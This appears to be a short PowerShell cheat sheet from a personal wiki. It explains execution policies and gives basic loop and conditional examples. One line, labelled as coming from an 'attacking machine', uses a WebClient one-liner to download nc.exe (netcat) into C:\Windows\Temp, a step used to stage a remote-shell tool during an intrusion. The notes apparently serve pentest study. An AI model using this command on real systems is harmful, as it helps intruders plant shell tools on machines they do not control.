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Windows PowerShell
Execution Policies
PowerShell (PS) execution policies determine your authorization to execute PS scripts or not:
- Restricted: [default] Blocks all use of PS scripts
- AllSigned: Requires PS scripts to e signed by a trusted publisher
- RemoteSigned: This is a common “normal” setting in many systems…
- Allows any PS script written on the local machine.
- But requires downloaded scripts to be signed by a trusted publisher.
- Unrestricted: Allows any PS script but prompts you for confirmation on downloaded scripts.
- Bypass: Allows any and all PS scripts. Have at it!
Syntax for changing the PowerShell execution policy:
Set-ExecutionPolicy [name] # Example: Set-ExecutionPolicy RemoteSigned
Example Code
One-Liner Download
A very useful one-liner to download a file (nc.exe) from an attacking machine (IP and save it in C:\Windows\Temp using the same name:
(New-Object System.Net.WebClient).DownloadFile("", "C:\Windows\Temp\nc.exe")
For Loop
Write-Host "Hello world!" # Count up by one... for ($var=1; $var -le 5; $var++) { Write-Host "The value of var is: $var" } # Count up by two... for ($var=0; $var -le 10; $var=$var+2) { Write-Host "The value of var is: $var" }
Conditional Stmt
$a = 2 if ( $a -gt 2 ) { Write-Host "The value $a is greater than 2." } elseif ( $a -eq 2 ) { Write-Host "The value $a is equal to 2." } else { Write-Host ( "The value of $a is less than 2" + " or was not created or initialized." ) }
cheat_sheets_ps.txt · Last modified: 2022/12/29 23:43 by gman